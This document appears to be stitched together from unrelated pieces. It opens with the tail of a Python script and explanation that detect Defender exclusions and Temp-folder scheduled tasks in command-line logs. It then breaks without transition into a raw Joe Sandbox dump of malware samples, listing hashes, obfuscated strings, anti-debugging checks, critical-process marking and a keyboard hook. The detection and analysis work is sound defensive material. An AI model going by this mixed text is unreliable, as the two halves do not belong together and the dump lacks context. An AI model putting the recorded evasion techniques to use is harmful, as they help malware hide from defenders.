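    path = image_path(cmdline)
    if USER_TEMP.search(path):
        found.append(Finding("execution_from_user_temp", "", path, cmdline))

    return found


def scan(log: str) -> list[Finding]:
    """Run analyze() over every non-empty line of a command-line log."""
    return [f for line in log.strip().splitlines() if line.strip() for f in analyze(line)]


def correlate(findings: list[Finding]) -> set[str]:
    """Paths both excluded from Defender and registered as a scheduled-task action."""
    excluded = {f.value.lower() for f in findings if f.rule == "defender_exclusion_path"}
    scheduled = {f.value.lower() for f in findings if f.rule.startswith("schtasks_temp_target")}
    return excluded & scheduled


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f.rule:36} {f.technique:10} {f.value}")
    print("excluded AND scheduled:", correlate(results))
```

The per-line rules fire on each of the four PowerShell launches and on the schtasks creation; correlate() then reduces the noise to the single Temp path that was both excluded and scheduled, which is the record an analyst would pivot on first. A production rule would read these command lines from Sysmon event 1 or Security event 4688 rather than from a constructed list, and would also match the Base64-encoded form of the same Add-MpPreference cmdlet, which this example does not decode.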

                                                                                      Execution Graph

                                                                                      Execution Coverage:78.9%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:9.1%
                                                                                      Total number of Nodes:22
                                                                                      Total number of Limit Nodes:1

                                                                                      Callgraph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      • Opacity -> Relevance
                                                                                      • Disassembly available
                                                                                      callgraph nodes: Function_00401000, Function_004013B4, Function_00401475, Function_004013FF, Function_00401358, Function_0040108C
                                                                                      callgraph edges: Function_00401475 -> Function_004013FF; Function_004013FF -> Function_004013B4, Function_00401358, Function_0040108C; Function_0040108C -> Function_00401000

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1254848763.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1254664077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1254969513.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1256261076.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_PixpFUv4G7.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                                                                                      • String ID:
                                                                                      • API String ID: 3649950142-0
                                                                                      • Opcode ID: d13ffaed50b34c3bc6c1db2eee5796bdcff0477068228ef5aa395199288844a4
                                                                                      • Instruction ID: 66cff4c9c878bf8aa2b1410eb4bc4b7608e7e5898a8f40ad2895ff3de646009b
                                                                                      • Opcode Fuzzy Hash: d13ffaed50b34c3bc6c1db2eee5796bdcff0477068228ef5aa395199288844a4
                                                                                      • Instruction Fuzzy Hash: 77111EF6E01204BBCB10EBE8EC81F5B77BCAB59344F10447AB805E73A1E538EA458765

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1254848763.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1254664077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1254969513.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1256261076.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_PixpFUv4G7.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                      • String ID: 8BC$8BC$%s\%s$& @$2 @$2-J]$88A$E8A
                                                                                      • API String ID: 1891165703-1496258695
                                                                                      • Opcode ID: 882598a55b71346998ba52c65563725e66f32605d8b776d4f626809784564fe0
                                                                                      • Instruction ID: deb19d4d0723d3d67ee9a72fdb9f6f6ed23126a5912012a87401ff7aba8da44e
                                                                                      • Opcode Fuzzy Hash: 882598a55b71346998ba52c65563725e66f32605d8b776d4f626809784564fe0
                                                                                      • Instruction Fuzzy Hash: 9B71E4F1E001049BDB54DB9CDC81BDD77B9EB44309F04417AF60AFB391E639AA848B59

                                                                                      Control-flow Graph

                                                                                      Control-flow graph rendering omitted; block 401000-40102e calls malloc, followed by a loop over blocks 401031-401085 and exit at 401087-40108b.
                                                                                      APIs
                                                                                      Strings
                                                                                      • ]]/335@^_a]^)_gkee_7ix=6*z(feu<>, xrefs: 0040106E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1254848763.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1254664077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1254969513.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1256261076.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_PixpFUv4G7.jbxd
                                                                                      Similarity
                                                                                      • API ID: malloc
                                                                                      • String ID: ]]/335@^_a]^)_gkee_7ix=6*z(feu<>
                                                                                      • API String ID: 2803490479-1468156545
                                                                                      • Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                      • Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
                                                                                      • Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                      • Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

                                                                                      Control-flow Graph

                                                                                      Control-flow graph rendering omitted; block 4013ff-401452 calls the internal functions 401358, 40108c and 4013b4.
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1254848763.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1254664077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1254969513.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1256261076.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_PixpFUv4G7.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$fopenstrcmpstrcpy
                                                                                      • String ID: D`{vD`{v$D`{vD`{v
                                                                                      • API String ID: 1173922025-2698036915
                                                                                      • Opcode ID: 4f9e64c81c8a16543b34c99aeb52530aa6aad91c054d3e45980c1e6a43f1a0b4
                                                                                      • Instruction ID: aca092302289a549aeab8a8447becf2e0ff84cd71f36c661b78afd72486b09b0
                                                                                      • Opcode Fuzzy Hash: 4f9e64c81c8a16543b34c99aeb52530aa6aad91c054d3e45980c1e6a43f1a0b4
                                                                                      • Instruction Fuzzy Hash: EBF0ACB5A01248EFCB40EFEDE981E8E77F8BB59304F104465F948D7351E634EA458B54

                                                                                      Execution Graph

                                                                                      Execution Coverage: 20.9%
                                                                                      Dynamic/Decrypted Code Coverage: 100%
                                                                                      Signature Coverage: 25%
                                                                                      Total number of Nodes: 12
                                                                                      Total number of Limit Nodes: 0

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2520885611.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaacb30000_Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CAN_^
                                                                                      • API String ID: 0-3098826533
                                                                                      • Opcode ID: 827c51d9c4a15ccb5610eaa5ddabecf53536322225b896feda6fe20e28d6bd44
                                                                                      • Instruction ID: 2069e9314d364be70344fa10793b5a04688d6cada5cc5975c54b33c72c98731f
                                                                                      • Opcode Fuzzy Hash: 827c51d9c4a15ccb5610eaa5ddabecf53536322225b896feda6fe20e28d6bd44
                                                                                      • Instruction Fuzzy Hash: 5B22B7B0B19A598FE794EB3CC459A79B7D2FF99300F404579E40EC37E2DE29A8058781

                                                                                      Control-flow Graph

                                                                                      Control-flow graph rendering omitted; block 7ffaacb3764a-7ffaacb37b0d calls CheckRemoteDebuggerPresent, branching to 7ffaacb37b0f or 7ffaacb37b15-7ffaacb37b58.
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2520885611.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaacb30000_Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID: CheckDebuggerPresentRemote
                                                                                      • String ID:
                                                                                      • API String ID: 3662101638-0
                                                                                      • Opcode ID: e384a2efea225c93ee5e45418a5965912c0f1f4f1b0a58da765842941db2b275
                                                                                      • Instruction ID: b8cb536f28a284fee7d9f4318fa7d1a500f41433a2966d4d323788f3c15d6104
                                                                                      • Opcode Fuzzy Hash: e384a2efea225c93ee5e45418a5965912c0f1f4f1b0a58da765842941db2b275
                                                                                      • Instruction Fuzzy Hash: 7831E67190861C8FDB58DF5CC8497F9BBE0EF65311F14412AD48AD7251DB70A846CBD1

                                                                                      Control-flow Graph

                                                                                      Control-flow graph rendering omitted; blocks 7ffaacb36096 through 7ffaacb36553 with no API calls, one internal call to 7ffaacb36554.
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2520885611.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaacb30000_Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5c437160bd610dfb6ee9438410077199b864a6f5711602d7d1e7e8eb7e743f2f
                                                                                      • Instruction ID: 18497f36d9e1e3f2f5bd8836604a10c7497f4e01e428c52f327f5557e247fbc2
                                                                                      • Opcode Fuzzy Hash: 5c437160bd610dfb6ee9438410077199b864a6f5711602d7d1e7e8eb7e743f2f
                                                                                      • Instruction Fuzzy Hash: 19F1C470908A8D8FEBA8DF28C8557E937E1FF55300F04826EE84DC7691DB74E9458B81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2520885611.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaacb30000_Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2e4417bacae9e1537afc086f863ca941c928848588e3727dfe769770f9d9864c
                                                                                      • Instruction ID: 65253915ec3db6bf9e15faada3c2d8028d27e566224190cfbf138b8916c3e24a
                                                                                      • Opcode Fuzzy Hash: 2e4417bacae9e1537afc086f863ca941c928848588e3727dfe769770f9d9864c
                                                                                      • Instruction Fuzzy Hash: D5E1C230908A4E8FEBA8DF28C8557E977E1FF55310F04826AE84DC7691DF78E8448B81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2520885611.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaacb30000_Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d451a7aacca96626b5c979c5a1768eab9d78a15663013e20e22c180be25d3586
                                                                                      • Instruction ID: 3dfa89f2178c69a7463f6aa1208727b00fba56e947f5470bc1e0be31f21b9f6c
                                                                                      • Opcode Fuzzy Hash: d451a7aacca96626b5c979c5a1768eab9d78a15663013e20e22c180be25d3586
                                                                                      • Instruction Fuzzy Hash: 1AB193B0B1DA598FFB98EB38C46567976D2EF99300F048179D45EC3793DE29E8058382
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2520885611.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaacb30000_Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 60ddd7f57ac531c5b3bab2de60aee10e0d0bcb2d24f3dd1062d7b7ca5e41f79a
                                                                                      • Instruction ID: 9e687112019e6de74b1393ba644417875ede66e86b5806a591dbbd5a2224d8c9
                                                                                      • Opcode Fuzzy Hash: 60ddd7f57ac531c5b3bab2de60aee10e0d0bcb2d24f3dd1062d7b7ca5e41f79a
                                                                                      • Instruction Fuzzy Hash: E5515351A5E6C54FE786A778D8646757FE9DF87219B0804FBE0CDC3293DD08884AC382

                                                                                      Control-flow Graph

                                                                                      Control-flow graph rendering omitted; block 7ffaacb3982d-7ffaacb39930 calls RtlSetProcessIsCritical, branching to 7ffaacb39932 or 7ffaacb39938-7ffaacb3996d.
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2520885611.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaacb30000_Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalProcess
                                                                                      • String ID:
                                                                                      • API String ID: 2695349919-0
                                                                                      • Opcode ID: 03e94733f998c5de459134ee5834a568eef7438ccf075cbc2ed539e35651e03f
                                                                                      • Instruction ID: f183e8843141f9a25954faea1abf5e8b030c1c605972e1615ea911ca18bf9704
                                                                                      • Opcode Fuzzy Hash: 03e94733f998c5de459134ee5834a568eef7438ccf075cbc2ed539e35651e03f
                                                                                      • Instruction Fuzzy Hash: 2C41357190CA988FEB19DB6CC8496B97BE0FF96311F14407ED0CAC3692DB74A846C791

                                                                                      Control-flow Graph

                                                                                      Control-flow graph rendering omitted; block 7ffaacb39e32-7ffaacb39e6f calls SetWindowsHookExW, branching to 7ffaacb39e71 or 7ffaacb39e77-7ffaacb39ea8.
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2520885611.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaacb30000_Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID: HookWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2559412058-0
                                                                                      • Opcode ID: 2e13cd4d574cbba4c1e03df4fc6976e49c9ea29aa35bf917abfda691c90a671f
                                                                                      • Instruction ID: 07ee1f41dbf762679c35adb813440ec9a394f23c9015ab9098d929ea9e1b47f4
                                                                                      • Opcode Fuzzy Hash: 2e13cd4d574cbba4c1e03df4fc6976e49c9ea29aa35bf917abfda691c90a671f
                                                                                      • Instruction Fuzzy Hash: D331E770A0CA588FEB48DB68D8466F97BE1EF5A321F00427ED04DC3292CA65A816C7C1

                                                                                      Control-flow Graph

                                                                                      Control-flow graph rendering omitted; block 7ffaacb37a51-7ffaacb37b0d calls CheckRemoteDebuggerPresent, branching to 7ffaacb37b0f or 7ffaacb37b15-7ffaacb37b58.
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2520885611.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaacb30000_Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID: CheckDebuggerPresentRemote
                                                                                      • String ID:
                                                                                      • API String ID: 3662101638-0
                                                                                      • Opcode ID: e8877c364f8ac600c607c6b6b4c4959773defff007d818a448a6d27da78c29b9
                                                                                      • Instruction ID: 576f5441e3214d23389c320764a96deca07c91c271cf9e61c3d71dcd4023ff2d
                                                                                      • Opcode Fuzzy Hash: e8877c364f8ac600c607c6b6b4c4959773defff007d818a448a6d27da78c29b9
                                                                                      • Instruction Fuzzy Hash: 8131017190861C8FCB58DF58C88ABE97BE0FF65321F05426AD489D7252DB34A846CB91

                                                                                      Execution Graph

                                                                                      Execution Coverage: 17.1%
                                                                                      Dynamic/Decrypted Code Coverage: 100%
                                                                                      Signature Coverage: 5%
                                                                                      Total number of Nodes: 80
                                                                                      Total number of Limit Nodes: 5
                                                                                      Execution graph rendering omitted; APIs called from its nodes: CloseHandle, GetSystemInfo, SetFilePointer, GetLongPathNameW, SetErrorMode, CreatePipe, WriteFile, CreateFileW, FindClose, FindNextFileW, GetFileType, CreateDirectoryW, DuplicateHandle, RegQueryValueExW.

                                                                                      Callgraph

                                                                                      Callgraph rendering omitted (node list of Function_xxxxxxxx entries at 00CF2xxx, 00CFAxxx/00CFBxxx and 00E00xxx/00E10xxx, with internal call edges).
                                                                                      APIs
                                                                                      • GetSystemInfo.KERNELBASE(?), ref: 00CFB2B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoSystem
                                                                                      • String ID:
                                                                                      • API String ID: 31276548-0
                                                                                      • Opcode ID: fc8bcd821ed1bc28c904f5961f9db40d2e873746afd6a31e7fb64c46d3bc11a2
                                                                                      • Instruction ID: abfcd8a1fbab7e8bbbbf1fd893b5d50642285a70359e32e552e8a8342fb97e6d
                                                                                      • Opcode Fuzzy Hash: fc8bcd821ed1bc28c904f5961f9db40d2e873746afd6a31e7fb64c46d3bc11a2
                                                                                      • Instruction Fuzzy Hash: F801A2714042448FDB50DF56D984769FBE4EF44320F18C4AADD498F642D379E908DB62

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 0 e00799-e007c7 2 e00b77 0->2 3 e007cd-e007da 0->3 5 e00b83-e00b8d 2->5 93 e007dc call e00ba0 3->93 94 e007dc call e10606 3->94 95 e007dc call e105df 3->95 6 e007e2 96 e007e2 call e00c60 6->96 97 e007e2 call e00c50 6->97 7 e007e8-e00802 call e00ba0 10 e00810 7->10 11 e00804-e0080e 7->11 12 e00815-e00817 10->12 11->12 13 e0089b-e00940 12->13 14 e0081d-e0088e 12->14 31 e00948-e009a9 call e00ba0 * 2 13->31 99 e00890 call e10606 14->99 100 e00890 call e00ca8 14->100 101 e00890 call e00c99 14->101 102 e00890 call e105df 14->102 29 e00896 29->31 41 e00b63-e00b67 31->41 42 e009af 31->42 41->5 44 e00b69-e00b75 41->44 43 e009b2-e009da 42->43 49 e009e0-e009e4 43->49 50 e00b51-e00b5d 43->50 44->5 51 e00b39-e00b48 call e00ba0 49->51 52 e009ea-e009fd 49->52 50->41 50->43 58 e00b4e 51->58 53 e00a70-e00a74 52->53 54 e009ff 52->54 57 e00a7a-e00aa7 53->57 53->58 56 e00a02-e00a24 54->56 63 e00a26 56->63 64 e00a2b-e00a5e 56->64 69 e00aa9 57->69 70 e00aae-e00ad5 57->70 58->50 63->64 75 e00a60 64->75 76 e00a67-e00a6e 64->76 69->70 78 e00ad7-e00aed 70->78 79 e00b1d-e00b25 70->79 75->76 76->53 76->56 83 e00af4-e00b1b 78->83 84 e00aef 78->84 79->58 83->79 88 e00b27-e00b37 83->88 84->83 88->58 93->6 94->6 95->6 96->7 97->7 99->29 100->29 101->29 102->29
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283091929.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e00000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: :@*l$:@*l$\OQl
                                                                                      • API String ID: 0-1411936664
                                                                                      • Opcode ID: d92342a1690af54f6d6e0b631118ca3d5acbca2d42e9db6f02e3a171fb9aea17
                                                                                      • Instruction ID: 871b1af6ccffa8eed960de997655b2d9c1dd92e09bd1940826b7a49387787dad
                                                                                      • Opcode Fuzzy Hash: d92342a1690af54f6d6e0b631118ca3d5acbca2d42e9db6f02e3a171fb9aea17
                                                                                      • Instruction Fuzzy Hash: 1DA17D30B012048BDB19EB74D858BBE77B6EB8830CF248429D906A77D4DF749C46CBA1

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 103 e00c99-e00ce1 107 e00ce3-e00d0c 103->107 108 e00d0e-e00d16 103->108 111 e00d1e-e00d92 107->111 108->111 122 e00d99-e00dcb 111->122
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283091929.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e00000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `l$`l
                                                                                      • API String ID: 0-2458287728
                                                                                      • Opcode ID: 52a0f52e98e6ee2dbff3562803b9e5209742cf0b514b6f1eb814f93f0f7274b2
                                                                                      • Instruction ID: 57e4e30a5213792f603a3ac9f3635737eb7eb5b3b948254e51292a62de68c290
                                                                                      • Opcode Fuzzy Hash: 52a0f52e98e6ee2dbff3562803b9e5209742cf0b514b6f1eb814f93f0f7274b2
                                                                                      • Instruction Fuzzy Hash: DD2104307007848BC752EB398441BAE7AD69FC6208F88482CD485DB7C1DF76E90687E2

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 125 e00ca8-e00ce1 128 e00ce3-e00d0c 125->128 129 e00d0e-e00d16 125->129 132 e00d1e-e00d92 128->132 129->132 143 e00d99-e00dcb 132->143
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1283091929.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_e00000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `l$`l
                                                                                      • API String ID: 0-2458287728
                                                                                      • Opcode ID: 553a221341c21dabae740b8ab6c693f5249364ea7e0f6dc8ded8d95870a41e1e
                                                                                      • Instruction ID: 25e833dc93be7166ce5c1aa002c89c2bcc2608afe56768ee60006f2658b22bd8
                                                                                      • Opcode Fuzzy Hash: 553a221341c21dabae740b8ab6c693f5249364ea7e0f6dc8ded8d95870a41e1e
                                                                                      • Instruction Fuzzy Hash: 0221F3307007448BC754EB35C4417AEB7E69BC4308B94882CD046EB7C0DF75E9068BE2

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 146 cfa676-cfa706 150 cfa70b-cfa717 146->150 151 cfa708 146->151 152 cfa71c-cfa725 150->152 153 cfa719 150->153 151->150 154 cfa727-cfa74b CreateFileW 152->154 155 cfa776-cfa77b 152->155 153->152 158 cfa77d-cfa782 154->158 159 cfa74d-cfa773 154->159 155->154 158->159
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00CFA72D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: fda69c9686ebf3102e6d0a900956216c22eb978dedee032c7e3d005d8daf41e7
                                                                                      • Instruction ID: 6bdab5743f34b7b86ea09994844cd3d4c0eec9d6f4ee8f42f24943993897397a
                                                                                      • Opcode Fuzzy Hash: fda69c9686ebf3102e6d0a900956216c22eb978dedee032c7e3d005d8daf41e7
                                                                                      • Instruction Fuzzy Hash: 323190B15093846FE712CB25DD44FA2BFF8EF06314F08849EE9858B652D375A909CB72

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 162 cfb2f6-cfb39b 167 cfb39d-cfb3a5 DuplicateHandle 162->167 168 cfb3f3-cfb3f8 162->168 169 cfb3ab-cfb3bd 167->169 168->167 171 cfb3bf-cfb3f0 169->171 172 cfb3fa-cfb3ff 169->172 172->171
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,00000E24), ref: 00CFB3A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: 8c03fb29f9cc19996b462254559d5df2ed18404a8eaf50c2f5be8087dd75a643
                                                                                      • Instruction ID: 60311c09a109bd85d4366de9967ee8632d259a5d328aaf6553c88d7deefcfa1d
                                                                                      • Opcode Fuzzy Hash: 8c03fb29f9cc19996b462254559d5df2ed18404a8eaf50c2f5be8087dd75a643
                                                                                      • Instruction Fuzzy Hash: 9B31A171405344AFE7228B61DC44FA6BFBCEF06220F04889AE985CB562D374A9098B71

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 176 cfadb4-cfae4f 181 cfaea7-cfaeac 176->181 182 cfae51-cfae59 DuplicateHandle 176->182 181->182 183 cfae5f-cfae71 182->183 185 cfaeae-cfaeb3 183->185 186 cfae73-cfaea4 183->186 185->186
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,00000E24), ref: 00CFAE57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: b487d95eccddf62fc9e39dc71ab391711326406ee47c12d1c08ae5c445604eb2
                                                                                      • Instruction ID: b84bb47a5ffccab6ece57b68c4d2090527c449d810e98ddc3fd4f1c0cf5ca12b
                                                                                      • Opcode Fuzzy Hash: b487d95eccddf62fc9e39dc71ab391711326406ee47c12d1c08ae5c445604eb2
                                                                                      • Instruction Fuzzy Hash: C831A171405344AFEB228B61DC44FA7BFBCEF45224F0488AEF985DB552D224A919CB61

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 190 cfa120-cfa1f3 FindNextFileW
                                                                                      APIs
                                                                                      • FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 00CFA1C2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindNext
                                                                                      • String ID:
                                                                                      • API String ID: 2029273394-0
                                                                                      • Opcode ID: 00ba911f0243bb0efac80a72c828395ef5dd6ced685fca5d59e4d5fbb66d3260
                                                                                      • Instruction ID: 8fd8d89686a9790dee0b9dafd5ff3f5b6f91700973947f2fbdbec7ced4e1b860
                                                                                      • Opcode Fuzzy Hash: 00ba911f0243bb0efac80a72c828395ef5dd6ced685fca5d59e4d5fbb66d3260
                                                                                      • Instruction Fuzzy Hash: 4E21B27140D3C06FD3128B258C51BA6BFB8EF47620F1985DBE884DF693D225A919C7A2

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 212 cfadda-cfae4f 216 cfaea7-cfaeac 212->216 217 cfae51-cfae59 DuplicateHandle 212->217 216->217 218 cfae5f-cfae71 217->218 220 cfaeae-cfaeb3 218->220 221 cfae73-cfaea4 218->221 220->221
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,00000E24), ref: 00CFAE57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1282628391.0000000000CFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CFA000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_cfa000_unarchiver.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: f7e91a034c40b2337800009f336dfd9b61bdbca4ae85965020318cc41e681e83
